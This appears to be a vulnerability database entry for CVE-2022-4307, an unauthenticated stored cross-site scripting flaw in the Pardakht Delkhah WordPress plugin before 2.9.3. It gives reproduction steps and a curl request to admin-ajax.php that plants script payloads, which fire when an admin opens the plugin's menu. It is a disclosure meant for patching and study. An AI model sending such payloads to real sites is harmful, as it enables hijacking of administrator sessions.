Lucene search
CydaveWPEX-ID:4000BA69-D73F-4C5B-A299-82898304CEBBHistoryDec 27, 2022 - 12:00 a.m.
Pardakht Delkhah < 2.9.3 - Unauthenticated Stored XSS
2022-12-2700:00:00
cydave
187
wooccommerce installation
vulnerable plugin
gateway settings
curl request
xss trigger
admin navigation
0.001 Low
EPSS
Percentile
50.4%
The plugin does not sanitise and escape some parameters, allowing unauthenticated attackers to send a request with XSS payloads, which will be triggered when a high privilege users such as admin visits a page from the plugin.
1. Install and activate WoocCommerce (dependency, no configuration required)
2. Install the vulnerable plugin (pardakht-delkhah 2.9.2)
3. Under plugin's menu, "Custom payment" > "Gateway Settings", hit the save button to set the default gateway.
4. Invoke the following curl request to store two XSS payloads (both of which will trigger an alert box:
curl http://localhost:10008/wp-admin/admin-ajax.php \
--data 'action=cupri_action&cupri_fmobile=981111111111&cupri_fprice="><script>alert(`xss1`)</script>&cupri_f0="><script>alert(`xss2`)</script>'
5. The XSS will be triggered when an admin navigates to the plugin's menu (/wp-admin/edit.php?post_type=cupri_pay)Related
cvelist
cvelist
CVE-2022-4307 Pardakht Delkhah < 2.9.3 - Unauthenticated Stored XSS
2023-01-23 14:31:29
nvd
nvd
CVE-2022-4307
2023-01-23 15:15:14
prion
prion
Design/Logic Flaw
2023-01-23 15:15:00
wpvulndb
wpvulndb
Pardakht Delkhah < 2.9.3 - Unauthenticated Stored XSS
2022-12-27 00:00:00
cve
cve
CVE-2022-4307
2023-01-23 15:15:14